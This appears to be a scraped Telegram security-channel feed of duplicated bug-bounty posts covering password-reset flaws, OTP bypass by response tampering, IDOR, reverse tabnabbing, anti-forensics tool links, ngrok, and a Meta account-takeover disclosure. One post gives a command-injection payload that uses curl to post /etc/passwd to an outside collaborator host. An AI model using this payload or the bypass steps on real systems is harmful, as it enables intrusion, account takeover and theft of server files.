๐ฆBroken Access Control: From Password Reset to Mass Account Takeover
A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereโs how it unfolded:
1๏ธโฃ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2๏ธโฃ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3๏ธโฃ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4๏ธโฃ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5๏ธโฃ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.
๐ฏ Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.
Ref: Amit Kumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereโs how it unfolded:
1๏ธโฃ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2๏ธโฃ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3๏ธโฃ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4๏ธโฃ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5๏ธโฃ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.
๐ฏ Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.
Ref: Amit Kumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAnti Forensic Techniques Repositories #1
Anti Forensic Techniques
https://lnkd.in/dWmF3ikg
Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6
Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb
Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2
Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m
Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx
AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR
Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz
Ref: Joas A Santos
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Anti Forensic Techniques
https://lnkd.in/dWmF3ikg
Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6
Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb
Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2
Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m
Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx
AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR
Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz
Ref: Joas A Santos
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAwesome Security - A collection of awesome software, libraries, documents, books, and resources about security.
๐https://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.
๐https://lnkd.in/d3kxd9ik
โญ๏ธAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.
๐https://lnkd.in/dZPtJmXV
โญ๏ธawesome-web-hacking - Resources for learning about web application security.
๐https://lnkd.in/dqmeXsgj
โญ๏ธawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.
๐https://lnkd.in/dbbvfeYT
โญ๏ธawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.
๐https://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.
๐https://lnkd.in/de_PyRxH
security-hardening
โญ๏ธAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.
๐https://lnkd.in/dXztUHKk
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐https://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.
๐https://lnkd.in/d3kxd9ik
โญ๏ธAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.
๐https://lnkd.in/dZPtJmXV
โญ๏ธawesome-web-hacking - Resources for learning about web application security.
๐https://lnkd.in/dqmeXsgj
โญ๏ธawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.
๐https://lnkd.in/dbbvfeYT
โญ๏ธawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.
๐https://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.
๐https://lnkd.in/de_PyRxH
security-hardening
โญ๏ธAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.
๐https://lnkd.in/dXztUHKk
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
๐ฆOTP Bypass on Register account via Response manipulation:
1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.
Impact: Account Takeover
2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.
Ref: Het Vikam
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.
Impact: Account Takeover
2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.
Ref: Het Vikam
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBypass Login Prompts on Instagram & Pinterest! #OSINT
๐ #OSINT Protip 9 by KartikHunt3r:
If you didnโt know about this trick before, you should now! Thereโs a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.
๐ Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.
๐ก This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesโenhancing your digital investigation skills! ๐
๐ฌ Found this tip helpful? Like, share, and follow for more OSINT hacks!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ #OSINT Protip 9 by KartikHunt3r:
If you didnโt know about this trick before, you should now! Thereโs a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.
๐ Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.
๐ก This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesโenhancing your digital investigation skills! ๐
๐ฌ Found this tip helpful? Like, share, and follow for more OSINT hacks!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
UNDERCODE TESTING
๐ฆBypass Login Prompts on Instagram & Pinterest! #OSINT ๐ #OSINT Protip 9 by KartikHunt3r: If you didnโt know about this trick before, you should now! Thereโs a simple way to bypass the login prompt when scrolling through an Instagram profile. This techniqueโฆ
๐ฆ They may patch this for Instagram at any time, but this tip can be used for many other websites.
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆLive Bug Bounty :
Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! ๐ In todayโs video, weโre diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).
๐ What Youโll Learn in This Video
1๏ธโฃ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2๏ธโฃ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.
Ref: Rohith S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! ๐ In todayโs video, weโre diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).
๐ What Youโll Learn in This Video
1๏ธโฃ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2๏ธโฃ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.
Ref: Rohith S.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPOC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.
02: I add this for getting the server location and other information. I replace with my Burp collaborator:
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)
04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"
05: In Burp collaborator, I can see the server's /etc/passwd file.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.
02: I add this for getting the server location and other information. I replace with my Burp collaborator:
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)
04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"
05: In Burp collaborator, I can see the server's /etc/passwd file.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐
๐๐๐ ๐๐๐๐๐๐๐๐๐ - ๐๐๐๐๐ ๐๐๐๐๐ ๐๐๐
๐๐๐๐๐๐๐๐ ๐๐๐๐๐๐๐๐
Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.
๐ ๐๐จ๐๐๐ ๐ฌ๐ข๐จ๐ฅ ๐๐ข๐ ๐ ๐๐๐
๐ How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS
๐ ๐ก๐๐ง๐ช๐ข๐ฅ๐ ๐ฆ๐๐๐จ๐ฅ๐๐ง๐ฌ
๐ Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ
๐ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง๐๐ก๐
๐ Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0
๐ Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK
๐ ๐ช๐๐ ๐๐ฃ๐ฃ๐๐๐๐๐ง๐๐ข๐ก ๐๐ก๐ ๐๐จ๐ฅ๐ฃ ๐ฆ๐จ๐๐ง๐
๐ Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP
๐ Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ
๐ Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW
๐ ๐๐ ๐ฃ๐ฅ๐ข๐ฉ๐ ๐ฌ๐ข๐จ๐ฅ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง ๐ฅ๐๐ฃ๐ข๐ฅ๐ง๐ฆ
๐ Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV
๐ ๐ฅ๐๐ ๐ง๐๐๐ ๐๐ก๐
๐ Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2
๐ OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN
๐ ๐๐๐ข๐จ๐ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง
๐ Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI
๐ Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ
๐ Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY
๐ ๐ช๐๐๐ฏ
๐ Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO
๐ Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT
๐ ๐๐ข๐ ๐๐จ๐ก๐ง๐๐ก๐
๐ How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX
๐ Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1
๐ ๐๐ข๐ก๐จ๐ฆ
๐ Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU
Post Credit : Gabrielle
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.
๐ ๐๐จ๐๐๐ ๐ฌ๐ข๐จ๐ฅ ๐๐ข๐ ๐ ๐๐๐
๐ How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS
๐ ๐ก๐๐ง๐ช๐ข๐ฅ๐ ๐ฆ๐๐๐จ๐ฅ๐๐ง๐ฌ
๐ Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ
๐ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง๐๐ก๐
๐ Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0
๐ Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK
๐ ๐ช๐๐ ๐๐ฃ๐ฃ๐๐๐๐๐ง๐๐ข๐ก ๐๐ก๐ ๐๐จ๐ฅ๐ฃ ๐ฆ๐จ๐๐ง๐
๐ Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP
๐ Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ
๐ Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW
๐ ๐๐ ๐ฃ๐ฅ๐ข๐ฉ๐ ๐ฌ๐ข๐จ๐ฅ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง ๐ฅ๐๐ฃ๐ข๐ฅ๐ง๐ฆ
๐ Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV
๐ ๐ฅ๐๐ ๐ง๐๐๐ ๐๐ก๐
๐ Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2
๐ OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN
๐ ๐๐๐ข๐จ๐ ๐ฃ๐๐ก๐ง๐๐ฆ๐ง
๐ Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI
๐ Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ
๐ Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY
๐ ๐ช๐๐๐ฏ
๐ Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO
๐ Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT
๐ ๐๐ข๐ ๐๐จ๐ก๐ง๐๐ก๐
๐ How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX
๐ Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1
๐ ๐๐ข๐ก๐จ๐ฆ
๐ Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU
Post Credit : Gabrielle
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
YouTube
How to Build a Home Lab for Infosec with Ralph May | 1 Hour
๐ Register for webcasts, summits, and workshops -
https://poweredbybhis.com
Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going!
๐ Learn penetration testing with Ralph May from Antisyphonโฆ
https://poweredbybhis.com
Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going!
๐ Learn penetration testing with Ralph May from Antisyphonโฆ
๐ฆThe Ultimate IDOR Testing Checklist!
Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.
This comprehensive list covers everything from:
โ Testing parameter pollution
โ Exploring API versions and extensions
โ Swapping GUIDs with numeric IDs
โ Bypassing 403/401 responses
โ Blind IDORs and chaining with XSS for account takeovers
Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.
Ref: Amit Kumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.
This comprehensive list covers everything from:
โ Testing parameter pollution
โ Exploring API versions and extensions
โ Swapping GUIDs with numeric IDs
โ Bypassing 403/401 responses
โ Blind IDORs and chaining with XSS for account takeovers
Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.
Ref: Amit Kumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
SIMULATION FOR
CYBERSECURITY
ANALYST POSITION.pdf
CYBERSECURITY
ANALYST POSITION.pdf
238 KB
๐ฆ"Interview Simulation For Cybersecurity Analyst Position (L1, L2, L3) From Various Background Complete With ATS Resume Examples". In this document, I have prepared six different career backgrounds for individuals seeking a cybersecurity analyst role, whether they are transitioning from another field or moving from L1 to L2 or L3 positions. Additionally, I have provided interview simulations for each job application, along with tailored ATS-optimised resumes.
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆUser Automation Process Using CSV:
1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.
Mossad Hamady
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.
Mossad Hamady
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆNgrok โ Simplified Tunneling.
ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.
๐ What Makes Ngrok a Must-Have Tool?
1๏ธโฃ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.
2๏ธโฃ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.
3๏ธโฃ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.
4๏ธโฃ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.
5๏ธโฃ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether itโs a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.
๐ง How to Get Started with Ngrok
1๏ธโฃ Install Ngrok
Download and install Ngrok from the official website:
๐ https:// ngrok.com /download
For Linux, run:
sudo apt install ngrok
2๏ธโฃ Sign Up for Free or Pro Plan
Ngrokโs free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.
3๏ธโฃ Expose Your Local Server
Run your local app (e.g., on port 5000):
python -m http.server 5000
Start the Ngrok tunnel:
ngrok http 5000
Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!
๐ When You Need a Public IP
Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, youโll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.
Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.
For example:
โข If youโre delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
โข AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.
Have you used AWS servers or Ngrok in your pentesting or development setups? ๐
Andrew P.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.
๐ What Makes Ngrok a Must-Have Tool?
1๏ธโฃ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.
2๏ธโฃ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.
3๏ธโฃ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.
4๏ธโฃ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.
5๏ธโฃ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether itโs a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.
๐ง How to Get Started with Ngrok
1๏ธโฃ Install Ngrok
Download and install Ngrok from the official website:
๐ https:// ngrok.com /download
For Linux, run:
sudo apt install ngrok
2๏ธโฃ Sign Up for Free or Pro Plan
Ngrokโs free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.
3๏ธโฃ Expose Your Local Server
Run your local app (e.g., on port 5000):
python -m http.server 5000
Start the Ngrok tunnel:
ngrok http 5000
Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!
๐ When You Need a Public IP
Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, youโll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.
Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.
For example:
โข If youโre delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
โข AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.
Have you used AWS servers or Ngrok in your pentesting or development setups? ๐
Andrew P.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Just Released: A comprehensive Active Directory threat hunting tool that makes detecting suspicious activities easier than ever!
โจ Key Features:
โข Real-time attack detection
โข Advanced timing analysis
โข Pattern recognition
โข Multi-format reporting (CSV/JSON/HTML)
โข Built-in attack simulation
๐ Detects:
โข Password spray attacks
โข Brute force attempts
โข Account lockouts
โข Off-hours activity
โข Geographically impossible logins
โข Service account misuse
โข Admin account abuse
โก๏ธ Smart Analysis:
โข Time-based attack correlation
โข Activity pattern matching
โข User behavior analysis
โข Configurable business hours
โข Customizable thresholds
๐งช Includes Test Framework:
โข Simulate various attack scenarios
โข Validate detection capabilities
โข Test environment readiness
โข Verify audit policies
๐ Get started: https://lnkd.in/gbuaaswB
Michael H.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โจ Key Features:
โข Real-time attack detection
โข Advanced timing analysis
โข Pattern recognition
โข Multi-format reporting (CSV/JSON/HTML)
โข Built-in attack simulation
๐ Detects:
โข Password spray attacks
โข Brute force attempts
โข Account lockouts
โข Off-hours activity
โข Geographically impossible logins
โข Service account misuse
โข Admin account abuse
โก๏ธ Smart Analysis:
โข Time-based attack correlation
โข Activity pattern matching
โข User behavior analysis
โข Configurable business hours
โข Customizable thresholds
๐งช Includes Test Framework:
โข Simulate various attack scenarios
โข Validate detection capabilities
โข Test environment readiness
โข Verify audit policies
๐ Get started: https://lnkd.in/gbuaaswB
Michael H.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
This media is not supported in your browser
VIEW IN TELEGRAM
Free AD-ThreatHunting
WIN_fhacking.pdf
522.6 KB
๐ฆ๐พ๐๐๐
๐๐๐ ๐ณ๐๐๐๐๐๐ ๐ช๐๐๐๐ ๐บ๐๐๐๐ ๐ก
Effective logging is the cornerstone of a robust security posture. This "Windows Logging Cheat Sheet" is designed to guide you in setting up essential Windows ๐๐ฎ๐๐ข๐ญ ๐๐จ๐ฅ๐ข๐๐ข๐๐ฌ and ๐๐จ๐ ๐ ๐ข๐ง๐ to kickstart your Log Management Program.
Effective logging is the cornerstone of a robust security posture. This "Windows Logging Cheat Sheet" is designed to guide you in setting up essential Windows ๐๐ฎ๐๐ข๐ญ ๐๐จ๐ฅ๐ข๐๐ข๐๐ฌ and ๐๐จ๐ ๐ ๐ข๐ง๐ to kickstart your Log Management Program.
๐ฆCritical Security Bug in Meta Ecosystem โ Zero-Click Account Takeover ๐
As cybersecurity researchers, my buddy Musawer Khan and I uncovered a Zero-Click Account Takeover (ATO) vulnerability in Meta's ecosystem. This vulnerability involved chaining two endpointsโone being a password reset URL that was indexed on platforms like URLScan and Wayback Machine. These URLs should ideally expire after a reasonable timeframe, yet they remained active and exploitable.
Impact:
1. Without requiring any user interaction (zero-click), we were able to gain unauthorized access to multiple accounts by chaining an endpoint and a password reset link.
2. This demonstrates a serious flaw in how reset links are managed, as they should expire promptly to mitigate potential misuse.
Despite providing a detailed proof-of-concept (PoC) showcasing the exploit, Meta Meta Facebook security team declined to classify this as a vulnerability under their bug bounty program, stating that the URLs were publicly exposed before indexing. However, the persistence of these sensitive URLs and the ability to exploit them points to a systemic issue.
Our Responsibility:
As responsible researchers, Musawer Khan and I ensured that all live URLs were expired from our side before disclosing the findings publicly. Our goal is to raise awareness about the importance of securing password reset mechanisms and ensuring that sensitive URLs are time-bound and properly invalidated.
Key Takeaways:
Password reset URLs should automatically expire after a short duration or after first use.
Mohaseen Katika
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
As cybersecurity researchers, my buddy Musawer Khan and I uncovered a Zero-Click Account Takeover (ATO) vulnerability in Meta's ecosystem. This vulnerability involved chaining two endpointsโone being a password reset URL that was indexed on platforms like URLScan and Wayback Machine. These URLs should ideally expire after a reasonable timeframe, yet they remained active and exploitable.
Impact:
1. Without requiring any user interaction (zero-click), we were able to gain unauthorized access to multiple accounts by chaining an endpoint and a password reset link.
2. This demonstrates a serious flaw in how reset links are managed, as they should expire promptly to mitigate potential misuse.
Despite providing a detailed proof-of-concept (PoC) showcasing the exploit, Meta Meta Facebook security team declined to classify this as a vulnerability under their bug bounty program, stating that the URLs were publicly exposed before indexing. However, the persistence of these sensitive URLs and the ability to exploit them points to a systemic issue.
Our Responsibility:
As responsible researchers, Musawer Khan and I ensured that all live URLs were expired from our side before disclosing the findings publicly. Our goal is to raise awareness about the importance of securing password reset mechanisms and ensuring that sensitive URLs are time-bound and properly invalidated.
Key Takeaways:
Password reset URLs should automatically expire after a short duration or after first use.
Mohaseen Katika
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
This media is not supported in your browser
VIEW IN TELEGRAM
Security Bug in Meta Ecosystem โ Zero-Click Account Takeover
This media is not supported in your browser
VIEW IN TELEGRAM
